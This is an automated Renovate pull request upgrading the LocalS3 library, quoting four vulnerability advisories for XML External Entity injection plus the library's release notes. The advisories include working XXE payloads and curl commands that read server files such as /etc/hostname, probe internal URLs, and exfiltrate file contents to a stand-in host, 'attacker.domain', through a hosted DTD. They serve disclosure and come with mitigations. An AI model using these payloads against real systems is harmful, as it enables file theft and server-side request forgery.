Update dependency io.github.robothy:local-s3-rest to v1.21 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
io.github.robothy:local-s3-rest	1.10 -> 1.21

GitHub Vulnerability Alerts

CVE-2025-27136

Description

The LocalS3 service's bucket creation endpoint is vulnerable to XML External Entity (XXE) injection. When processing the CreateBucketConfiguration XML document during bucket creation, the service's XML parser is configured to resolve external entities. This allows an attacker to declare an external entity that references an internal URL, which the server will then attempt to fetch when parsing the XML.

The vulnerability specifically occurs in the location constraint processing, where the XML parser resolves external entities without proper validation or restrictions. When the external entity is resolved, the server makes an HTTP request to the specified URL and includes the response content in the parsed XML document.

This vulnerability can be exploited to perform server-side request forgery (SSRF) attacks, allowing an attacker to make requests to internal services or resources that should not be accessible from external networks. The server will include the responses from these internal requests in the resulting bucket configuration, effectively leaking sensitive information.

Steps to Reproduce

1. Create an XML document that includes an external entity declaration pointing to the internal target:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://internal-web/flag.txt"> ]>
<CreateBucketConfiguration>
    <LocationConstraint>&xxe;</LocationConstraint>
</CreateBucketConfiguration>

2. Send a PUT request to create a new bucket with this configuration:

curl -X PUT http://app/test-bucket-2 -H 'Content-Type: application/xml' -d @​payload.xml

3. Retrieve the bucket location to see the resolved entity content:

curl http://app/test-bucket-2/?location

When these steps are executed, the server processes the XML, resolves the external entity by making a request to the internal URL, and includes the response in the bucket's location constraint. The attacker can then retrieve this information through the bucket location endpoint.

Mitigations

• Disable XML external entity resolution in the XML parser configuration. Most XML parsers have options to disable external entity processing.
• Implement proper input validation for XML documents, rejecting those that contain DOCTYPE declarations or external entity references.
• Use XML parsers that are configured securely by default and don't process external entities.
• If external entity processing is required, implement a whitelist of allowed URLs and validate all URLs before making any requests.

Impact

The vulnerability allows unauthenticated attackers to make the server perform HTTP requests to internal networks and services, potentially exposing sensitive information or enabling further attacks against internal systems. The attacker only needs to be able to send HTTP requests to the LocalS3 service to exploit this vulnerability.

GHSA-2466-4485-4pxj

Description

The LocalS3 project contains an XML External Entity (XXE) Injection vulnerability in its bucket operations that process XML data. Specifically, the vulnerability exists in the bucket ACL and bucket tagging operations. The application processes XML input without properly disabling external entity resolution, allowing an attacker to read arbitrary files from the server's filesystem.

The vulnerability occurs because the XML parser used by the application processes DOCTYPE declarations and allows external entity references. When processing bucket ACL or tagging operations, the application includes the content of external entities in its response, effectively exposing sensitive files from the server.

This type of vulnerability can be exploited to read sensitive files, perform server-side request forgery (SSRF), or potentially achieve denial of service through various XXE attack vectors.

Steps to Reproduce

1. Create a test bucket using PUT request to http://[server]/[bucket-name]

   curl -X PUT "http://app/xxe-test-bucket2"```
   

2. Send a PUT request to http://[server]/[bucket-name]?acl with the following XXE payload:

   curl -X PUT "http://app/xxe-test-bucket2?acl" \
   -H "Content-Type: application/xml" \
   -d '<?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE AccessControlPolicy [
       <!ENTITY xxe SYSTEM "file:///etc/hostname" >
   ]>
   <AccessControlPolicy>
       <Owner>
           <ID>&xxe;</ID>
           <DisplayName>test</DisplayName>
       </Owner>
       <AccessControlList>
           <Grant>
               <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
                   <ID>test</ID>
                   <DisplayName>test</DisplayName>
               </Grantee>
               <Permission>FULL_CONTROL</Permission>
           </Grant>
       </AccessControlList>
   </AccessControlPolicy>'
   

3. Send a GET request to http://[server]/[bucket-name]?acl to retrieve the bucket ACL

   curl "http://app/xxe-test-bucket2?acl"
   

After performing these steps, the content of the target file (/flag.txt in this case) will be included in the response within the ID field of the Owner element.

Mitigations

• Configure the XML parser to disable external entity resolution by setting XMLConstants.FEATURE_SECURE_PROCESSING to true
• Disable DOCTYPE declarations in the XML parser configuration
• Implement XML input validation and sanitization before processing
• Consider using JSON instead of XML for these operations if XML parsing is not strictly necessary

Impact

The vulnerability requires no authentication and can be exploited by any user who can make HTTP requests to the server. It allows reading arbitrary files from the server's filesystem, which could expose sensitive configuration files, credentials, or other confidential information. The vulnerability can also be used to perform SSRF attacks against internal systems.

GHSA-v232-254c-m6p7

Description

The LocalS3 project, an S3-compatible storage service, is vulnerable to XML External Entity (XXE) injection through its bucket tagging API. The vulnerability exists because the application processes XML input without properly disabling external entity resolution.

When processing XML data for bucket tagging operations, the application allows the definition and resolution of external entities. This vulnerability allows an attacker to read arbitrary files from the server's filesystem by defining an external entity that references local files.

The vulnerability is particularly severe because it allows direct access to sensitive files on the server's filesystem, bypassing any intended access controls. The XXE vulnerability can be exploited to read any file that the application process has access to, potentially exposing sensitive configuration files, credentials, or other confidential information.

Steps to Reproduce

1. Create a bucket in the LocalS3 service using any S3 client (e.g., AWS CLI, boto3)

2. Send a PUT request to the bucket tagging endpoint with the following XML payload:

   <?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE data [
       <!ENTITY xxe SYSTEM "file:///flag.txt" >
   ]>
   <Tagging><TagSet><Tag><Key>xxe</Key><Value>&xxe;</Value></Tag></TagSet></Tagging>

   curl -X PUT \
        -H "Host: app" \
        -H "Authorization: AWS dummy:dummy" \
        -H "Content-Type: application/xml" \
        --data-binary @​xxe.xml \
        http://app/bucket?tagging
   

3. Retrieve the bucket tags using a GET request to the same endpoint

   curl -H "Authorization: AWS dummy:dummy" http://app-1/bucket?tagging
   

4. The content of the targeted file will be returned in the tag value

The successful exploitation of this vulnerability results in the contents of sensitive files being disclosed through the XML response, demonstrating the ability to read arbitrary files from the server's filesystem.

Mitigations

• Disable XML external entity resolution in the XML parser configuration
• Implement proper XML parsing security controls such as disabling DTD processing altogether
• Use a safe parser configuration that doesn't process external entities or DTDs by default
• Validate and sanitize all XML input before processing to prevent injection of malicious entities

Impact

Critical severity vulnerability allowing unauthenticated attackers to read arbitrary files from the server's filesystem. This can lead to exposure of sensitive information, configuration files, and system data, potentially enabling further attacks against the system. The impact is heightened by the fact that the vulnerability requires minimal technical knowledge to exploit and can be triggered through standard S3 API operations.

GHSA-47qw-ccjm-9c2c

Description

The LocalS3 project, which implements an S3-compatible storage interface, contains a critical XML External Entity (XXE) Injection vulnerability in its XML parsing functionality. When processing XML requests for multipart upload operations, the application accepts and processes XML external entities, allowing an attacker to read local system files and potentially make outbound network connections.

The vulnerability exists because the XML parser is configured to process external entities and DTD (Document Type Definition) declarations without proper restrictions. This allows an attacker to define external entities that can read local files and exfiltrate their contents through outbound HTTP requests.

The vulnerability is particularly severe as it allows direct access to sensitive files on the filesystem, bypassing any directory traversal protections that might be in place for normal S3 operations.

Steps to Reproduce

1. Create a malicious DTD file containing the following content:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.domain/?flag=%file;'>">
%eval;
%exfil;

2. Host the malicious DTD file on an accessible web server

3. Initialize a multipart upload to the LocalS3 server:

curl -X PUT "http://app/test-bucket/test.txt?uploads"

4. Send a POST request to complete the multipart upload with the following XML payload:

   curl -X POST "http://app/test-bucket/test.txt?uploadId=[upload-id]" \
   -H "Content-Type: application/xml" \
   -d '<?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE data [
   <!ENTITY % dtd SYSTEM "http://attacker.domain/evil.dtd">
   %dtd;
   ]>
   <CompleteMultipartUpload>
      <Part>
          <PartNumber>1</PartNumber>
          <ETag>test</ETag>
      </Part>
   </CompleteMultipartUpload>'
   

The server will process the XML, load the external DTD, and when evaluating the entities, will read the contents of /etc/hostname and send them to the attacker's server via an HTTP request.

Mitigations

• Disable DTD processing in the XML parser configuration
• If DTD processing is required, disable the ability to load external entities and external DTDs
• Implement XML parsing with secure defaults using JAXP's XMLConstants.FEATURE_SECURE_PROCESSING feature
• Set up proper input validation and sanitization for all XML processing operations

Impact

An attacker can exploit this vulnerability to read arbitrary files from the server's filesystem and exfiltrate their contents through outbound HTTP requests. The vulnerability requires no authentication and can be exploited by anyone who can send requests to the LocalS3 server. This could lead to exposure of sensitive information including configuration files, credentials, and other confidential data stored on the server.

---

Release Notes

Robothy/local-s3 (io.github.robothy:local-s3-rest)

v1.21

Compare Source

What's Changed

• replace AmazonS3 with S3Client. by @​Robothy in #​164
• Refactor integration tests by @​Robothy in #​169
• Bump io.netty:netty-all from 4.1.117.Final to 4.1.118.Final by @​dependabot in #​165
• fix XML External Entity (XXE) Injection by @​Robothy in #​172
• Bump com.amazonaws:aws-java-sdk from 1.12.777 to 1.12.782 by @​dependabot in #​173
• Bump jackson from 2.18.1 to 2.18.2 by @​dependabot in #​167
• Bump junit5 from 5.11.2 to 5.11.4 by @​dependabot in #​166

Full Changelog: Robothy/local-s3@1.20...1.21

v1.20

Compare Source

What's Changed

• naming locals3 threads. by @​Robothy in #​154
• implement list multipart uploads. by @​Robothy in #​161
• support AWS unsigned chunked encoding input stream. by @​Robothy in #​163
• bump third-party libraries versions.

Full Changelog: Robothy/local-s3@1.19...1.20

v1.19

Compare Source

What's Changed

• decode copy source by @​Robothy in #​143
• Bump third-party library versions

Full Changelog: Robothy/local-s3@1.18...1.19

v1.18

Compare Source

v1.17

Compare Source

What's Changed

• support user-defined metadata in CreateMultipartUpload operation. by @​Robothy in #​100

Full Changelog: Robothy/local-s3@1.16...1.17

v1.16

Compare Source

What's Changed

• unset x-amz-tagging-count when object tagging is empty. by @​Robothy in #​96
• fix CVEs by @​Robothy in #​97
• Bump com.robothy.github-repository-release-plugin from 1.1 to 1.3 by @​dependabot in #​98

New Contributors

• @​dependabot made their first contribution in #​98

Full Changelog: Robothy/local-s3@1.15...1.16

v1.15

Compare Source

What's Changed

• fix incorrect content-type in multipart-uploaded objects. by @​Robothy in #​91
• supported virtual host by @​Robothy in #​93

Full Changelog: Robothy/local-s3@1.14...1.15

v1.14

Compare Source

What's Changed

• support inject S3Client instance to test method parameter. by @​Robothy in #​84
• asynchronously shutdown to decrease delay. by @​Robothy in #​85
• supports inject parameters of lifecycle methods by @​Robothy in #​87
• Support object tagging when creating multipart uploads by @​Robothy in #​88

Full Changelog: Robothy/local-s3@1.13...1.14

v1.13

Compare Source

What's Changed

• add bucket lock. by @​Robothy in #​71
• close channel if needed. by @​Robothy in #​74
• add ETag if not null. by @​Robothy in #​75
• shutdown event executors orderly by @​Robothy in #​76
• create LocalS3Router and remove spring-web by @​Robothy in #​78

Full Changelog: Robothy/local-s3@1.12...1.13

v1.12.2

Compare Source

Full Changelog: Robothy/local-s3@1.12.1...1.12.2

v1.12.1

Compare Source

What's Changed

• add bucket lock. by @​Robothy in #​71
• close channel if needed. by @​Robothy in #​74

Full Changelog: Robothy/local-s3@1.12...1.12.1

v1.12

Compare Source

What's Changed

• implement ListParts and AbortMultipartUploads by @​Robothy in #​68
• refactor ListObjects by @​Robothy in #​69
• implement ListObjectsV2 by @​Robothy in #​70

Full Changelog: Robothy/local-s3@1.11...1.12

v1.11

Compare Source

What's Changed

• implement GetBucketLocation by @​Robothy in #​63
• upgrade third party dependencies by @​Robothy in #​64

Full Changelog: Robothy/local-s3@1.10...1.11

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.